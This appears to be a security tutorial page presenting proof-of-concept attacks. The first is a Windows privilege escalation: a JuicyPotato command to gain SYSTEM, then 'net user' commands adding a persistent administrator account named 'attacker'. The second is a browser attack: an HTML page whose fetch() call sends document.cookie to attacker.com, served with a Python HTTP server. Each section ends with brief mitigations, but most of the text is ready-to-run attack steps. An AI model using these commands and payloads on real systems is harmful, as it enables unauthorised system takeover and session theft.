Privilege Escalation & Client-Side Exploits

1. Introduction

Privilege escalation is a technique attackers use to gain elevated access to a system. This can be achieved through various exploits, misconfigurations, or vulnerable software.

Client-side exploits, on the other hand, target users by exploiting vulnerabilities in applications such as web browsers, PDF readers, or email clients.

This document provides a structured proof-of-concept (PoC) for privilege escalation and a client-side exploit.

2. Privilege Escalation Exploit (Windows)

Step 1: Identifying a Vulnerable System

Run the following command to check current privileges:

whoami /priv

If the output shows SeImpersonatePrivilege enabled, the system might be vulnerable to token impersonation attacks.

Step 2: Exploiting the Vulnerability (JuicyPotato Attack)

Use JuicyPotato to escalate privileges:

JuicyPotato.exe -t * -p cmd.exe -l 1337 -c {clsid} -a "/c whoami"

If successful, the output should show NT AUTHORITY\SYSTEM, indicating privilege escalation.

Step 3: Maintaining Access

To create a new administrative user:

net user attacker P@ssw0rd /add
net localgroup administrators attacker /add

Now, the attacker has persistent administrative access.

Mitigation Strategies

  • Apply latest security patches to prevent privilege escalation exploits.

  • Disable unnecessary privileges like SeImpersonatePrivilege.

  • Use Windows Defender Exploit Guard to restrict token manipulation.

3. Client-Side Exploit (Browser-Based Attack)

Step 1: Setting Up a Malicious Webpage

An attacker can create a malicious HTML page to exploit browser vulnerabilities:

<html>
  <script>
    fetch('http://attacker.com/steal?cookie=' + document.cookie);
  </script>
</html>

When a victim visits this page, their session cookies are stolen.

Step 2: Hosting the Exploit

Host the malicious page using Python:

python3 -m http.server 8080

The attacker waits for the victim to visit the site.

Step 3: Exploiting the User

If the victim's browser is vulnerable, their session cookies are sent to the attacker's server.

Mitigation Strategies

  • Use Content Security Policy (CSP) to restrict script execution.

  • Enable HTTPOnly and Secure flags on cookies.

  • Keep browsers updated to patch known vulnerabilities.

PreviousProof-of-Concept Exploit: EternalBlue (MS17-010)NextBuffer Overflow Vulnerability